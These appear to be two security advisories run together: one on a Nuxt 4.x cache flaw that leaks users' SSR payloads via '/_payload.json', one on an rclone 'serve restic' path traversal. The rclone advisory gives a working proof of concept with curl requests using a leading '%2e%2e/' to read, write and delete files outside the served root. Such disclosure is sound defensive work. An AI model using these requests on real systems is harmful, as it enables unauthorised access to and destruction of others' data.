### Impact When a page is covered by `routeRules` `cache` / `swr` / `isr`, Nuxt enables runtime payload extraction and serves `/<page>/_payload.json`. On affected versions the renderer stored the SSR payload in the shared `cache:nuxt:payload` storage under a path-only key (no cookie, `authorization`, or `cache.varies` dimension) and, on a later payload request, returned the cached entry before route middleware / page guards ran again. As a result, once any authenticated user warms a protected, cached page, a subsequent `GET /<page>/_payload.json` from an unauthenticated client or a different authenticated user receives the first user's payload: the full SSR data for that route, including anything loaded via `useFetch` / `useAsyncData` (for example `/api/me`: profile, tenant, billing, token-like values). The HTML response stays correctly varied and protected; only the extracted payload leaks. Both cross-user (A warms, B receives A) and unauthenticated disclosure are exploitable. `cache.varies` does not mitigate it, because the payload cache ignores `varies`. Introduced when runtime payload extraction landed for cached routes (#34410); the regression is specific to the 4.x line, where the runtime `cache:nuxt:payload` storage was added and the `import.meta.prerender` gate on the payload-cache read/writes was dropped. The 3.x line shipped the same feature with the gate intact and is not affected. ### Patches Fixed in `[email protected]`. Runtime payload-cache reads and writes are again confined to prerendering (`import.meta.prerender`); at runtime, `/<page>/_payload.json` follows the normal render path so route middleware, `routeRules.appMiddleware`, and page guards run for the current request. `main` / v5 and the `3.x` line already had this property, so 3.x is not affected. ### Workarounds - Set `experimental.payloadExtraction: false` (reporter-validated): the standalone `/_payload.json` endpoint returns 404 and the page still serves a 200 with an inline payload. - Do not apply `cache` / `swr` / `isr` to authenticated pages that render user-specific SSR data. - As defense-in-depth, require authentication for `/**/_payload.json` at a proxy / CDN. - After upgrading, purge any CDN / platform cache that may already hold protected payloads.
## Summary `rclone serve restic` does not correctly reject URL paths beginning with `../`. On affected backends, an attacker who can access the REST endpoint can read, create, overwrite, or delete objects outside the path configured by the operator. The issue affects `rclone v1.40` through `rclone v1.74.4`. The proof of concept and backend matrix were validated with the official Linux AMD64 binary for `v1.74.4`, and the latest `master` commit reviewed at the time (`2217d38`) contained the same vulnerable validation. The main proof of concept uses WsgiDAV as an independent storage server and one rclone process. ## Affected versions All releases from `v1.40` through `v1.74.4` are affected. ## Affected components and backend propagation The primary vulnerable component is the backend-independent `WithRemote` middleware in `cmd/serve/restic/restic.go`, lines 235-264. It accepts a leading parent component and stores that unsafe relative path in the request context. The REST handlers then pass the same value to whichever rclone backend the operator configured. Therefore, the flaw is not specific to WebDAV. The backend determines whether the accepted `../` path escapes, is preserved, or is encoded as safe filename characters. The source locations and line numbers below correspond to the release used for dynamic testing: | Layer or backend | File and function | Relevant lines | Path propagation | Dynamic evidence | |---|---|---:|---|---| | REST server, primary cause | `cmd/serve/restic/restic.go`, `WithRemote` | 235-264 | Accepts a leading `../` remote and shares it with GET, HEAD, POST, and DELETE handlers | Confirmed through WebDAV | | WebDAV | `backend/webdav/webdav.go`, `(*Fs).filePath` | 421-427 | `path.Join(f.root, file)` removes the configured root when resolving `../` | read, write, delete | | FTP | `backend/ftp/ftp.go`, `(*Fs).NewObject`, `(*Object).Open`, `Update`, and `Remove` | 844-848, 1308-1311, 1349-1356, 1411-1415 | Each operation joins the backend root and remote with `path.Join` before the FTP request | read, write, delete | | HTTP | `backend/http/http.go`, `(*Fs).url` | 386-395 | Appends the escaped remote containing `../` to the configured endpoint URL | read | | Memory | `backend/memory/memory.go`, `(*Fs).split` | 227-231 | Joins `f.root` and the relative path before splitting the in-memory bucket and key | read, write, delete | | SFTP | `backend/sftp/sftp.go`, `(*Fs).remotePath` | 2086-2089 | Joins `f.absRoot` and the remote, allowing the parent component to remove the published subdirectory | read, write, delete | These are backend-specific manifestations of the same `WithRemote` validation flaw, not separate vulnerabilities. ## Technical Details `WithRemote` obtains the decoded URL path, removes external slashes, and tries to reject traversal by comparing the path with `path.Clean`: ```go urlpath = strings.Trim(urlpath, "/") // Reject any non-canonical path, in particular one containing ".." // traversal elements. if urlpath != "" && path.Clean(urlpath) != urlpath { http.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest) return } ``` The comment describes the intended behavior, but the condition does not reject every parent component. `path.Clean` preserves leading parent components in a relative path: ```text path.Clean("../outside.txt") = "../outside.txt" path.Clean("../../outside.txt") = "../../outside.txt" ``` Because both strings are equal, the middleware accepts the path. Internal traversal behaves differently: ```text path.Clean("a/../../outside.txt") = "../outside.txt" ``` These strings differ, so that request returns HTTP 400. This explains why the existing check appears to work while the leading variant bypasses it. After validation, `WithRemote` stores the accepted value in the request context: ```go ctx := context.WithValue(r.Context(), ContextRemoteKey, urlpath) next.ServeHTTP(w, r.WithContext(ctx)) ``` GET, POST, and DELETE handlers retrieve this same value. GET passes it to `s.f.NewObject`, POST passes it to `operations.RcatSize`, and DELETE resolves the object and calls `Remove`. There is no second containment check. WebDAV is used below as the concrete end-to-end example because it was the backend used for the main proof of concept. WebDAV is not the source of the validation flaw. The example demonstrates one way in which an unsafe remote accepted by `WithRemote` is propagated by a backend. The WebDAV backend joins its configured root with the attacker-controlled remote: ```go func (f *Fs) filePath(file string) string { subPath := path.Join(f.root, file) if f.opt.Enc != encoder.EncodeZero { subPath = f.opt.Enc.FromStandardPath(subPath) } return rest.URLPathEscapeAll(subPath) } ``` For the proof of concept: ```text f.root = "served-root" file = "../outside-secret.txt" path.Join("served-root", "../outside-secret.txt") = "outside-secret.txt" ``` The configured root is removed before encoding. WsgiDAV receives a normal operation for `/outside-secret.txt`, which is outside the root published by `rclone serve restic`. The same accepted leading parent path propagates through the other affected backends tested. FTP joins its root and remote with `path.Join` before object operations; HTTP preserves `served-root/../outside-secret.txt` when constructing the endpoint request; Memory joins the root and relative path before splitting the bucket and key; and SFTP joins `f.absRoot` and the remote in `remotePath`. In each case, the backend receives the leading parent component already accepted by `WithRemote`. The exact escape mechanism and available operations vary by backend. Conversely, S3-compatible and local backends did not escape in the tested configuration because they encoded `..` as filename characters. Expected behavior is HTTP 400 before any backend operation. Actual behavior is HTTP 200 followed by an operation outside `served-root`. ## Preconditions and impact The operator must publish a backend subdirectory, the endpoint must be reachable, and the backend credential must have access to a parent or sibling object. Exploitability also depends on backend path semantics. An attacker may: - read files and objects outside the published backup root; - create or overwrite sibling objects; - delete objects when deletion is permitted; - cross isolation boundaries between users, repositories, or automation jobs; - indirectly compromise another system if it later trusts an overwritten configuration, script, or artifact. `--append-only` reduces overwrite and delete impact but does not prevent traversal reads or creation of new objects. ## Proof of concept The following procedure was executed on Linux Mint 22.3 with the official `rclone v1.74.4` Linux AMD64 binary, WsgiDAV 4.3.5, and Cheroot 10.0.1. The rclone binary reports that it was built with Go 1.26.5. ### 1. Create the storage layout ```console $ mkdir -p poc/storage/served-root $ printf '%s\n' 'INSIDE-PUBLISHED-ROOT' > poc/storage/served-root/inside.txt $ printf '%s\n' 'SECRET-OUTSIDE-PUBLISHED-ROOT' > poc/storage/outside-secret.txt $ find poc/storage -type f poc/storage/served-root/inside.txt poc/storage/outside-secret.txt ``` ### 2. Start the independent WebDAV server ```console $ python3 -m venv poc/venv $ poc/venv/bin/pip install 'WsgiDAV==4.3.5' 'cheroot==10.0.1' $ poc/venv/bin/wsgidav --host=127.0.0.1 --port=39500 \ --root="$PWD/poc/storage" --auth=anonymous --no-config Running without configuration file. ... Server: WsgiDAV/4.3.5 Cheroot/10.0.1 Python/3.12.3 ``` ### 3. Download, verify, and start rclone ```console $ curl -fLO https://downloads.rclone.org/v1.74.4/rclone-v1.74.4-linux-amd64.zip $ curl -fLO https://downloads.rclone.org/v1.74.4/SHA256SUMS $ grep ' rclone-v1.74.4-linux-amd64.zip$' SHA256SUMS | sha256sum -c - rclone-v1.74.4-linux-amd64.zip: OK $ unzip rclone-v1.74.4-linux-amd64.zip $ ./rclone-v1.74.4-linux-amd64/rclone version | head -n 1 rclone v1.74.4 $ ./rclone-v1.74.4-linux-amd64/rclone serve restic ':webdav:served-root' \ --webdav-url http://127.0.0.1:39500 \ --webdav-vendor other --addr 127.0.0.1:39501 -vv NOTICE: webdav root 'served-root': Serving restic REST API on [http://127.0.0.1:39501/] ``` ### 4. Confirm normal access ```console $ curl --path-as-is -i http://127.0.0.1:39501/inside.txt HTTP/1.1 200 OK ... INSIDE-PUBLISHED-ROOT ``` ### 5. Read outside the published root ```console $ curl --path-as-is -i http://127.0.0.1:39501/%2e%2e/outside-secret.txt HTTP/1.1 200 OK ... SECRET-OUTSIDE-PUBLISHED-ROOT ``` ### 6. Write outside the published root ```console $ curl --path-as-is -i -X POST \ http://127.0.0.1:39501/%2e%2e/outside-write.txt \ --data-binary 'ATTACKER-CONTROLLED-OUTSIDE-ROOT' HTTP/1.1 200 OK ... $ cat poc/storage/outside-write.txt ATTACKER-CONTROLLED-OUTSIDE-ROOT ``` ### 7. Delete outside the published root ```console $ curl --path-as-is -i -X DELETE \ http://127.0.0.1:39501/%2e%2e/outside-write.txt HTTP/1.1 200 OK ... $ test ! -e poc/storage/outside-write.txt && echo 'physical file deleted' physical file deleted ``` ### 8. Compare with internal traversal ```console $ curl --path-as-is -i http://127.0.0.1:39501/a/../../outside-secret.txt HTTP/1.1 400 Bad Request ... Bad Request ``` This demonstrates why the existing check appears to work for interior traversal while the leading variant bypasses it. ## Tested backends | Backend | Local implementation | Result | Operations tested | |---|---|---|---| | WebDAV | WsgiDAV 4.3.5 | Affected | read, write, delete | | FTP | pyftpdlib 2.2.0 | Affected | read, write, delete | | HTTP | Python `http.server` 3.12.3 | Affected | read | | Memory | rclone memory backend | Affected | read, write, delete | | SFTP | `atmoz/sftp` OpenSSH server | Affected | read, write, delete | | S3 compatible | MinIO | No root escape observed | read, write, delete | | Local filesystem | default local encoding | No root escape observed | read, write, delete | Only the backends listed in this table were tested or classified. Every row was dynamically repeated with the same official `v1.74.4` Linux AMD64 binary identified in the proof of concept. ## Suggested remediation Reject `.` and `..` components in `WithRemote` before storing the remote in the context. Validating the decoded relative path with `io/fs.ValidPath`, with explicit handling for the empty API root, is one possible approach. Authorization and backend lookup should use the same validated representation. Regression tests should cover GET, HEAD, POST, and DELETE with `..`, `../x`, `../../x`, `%2e%2e/x`, `a/../x`, and `a/../../x`, both with and without `--private-repos`. ## Additional impact scenarios identified by the maintainer - `GET /../` could reach the list handler and enumerate the parent directory, allowing an attacker to discover object names before accessing them. - With `--append-only`, a request such as `DELETE /../locks/<name>` could satisfy the existing delete guard and delete an object outside the served root. - A bare `.` path was also accepted. On bucket-based backends, `POST /.` could write an object outside the intended served path. Credit: Caubi Loureiro of Vorpcel Research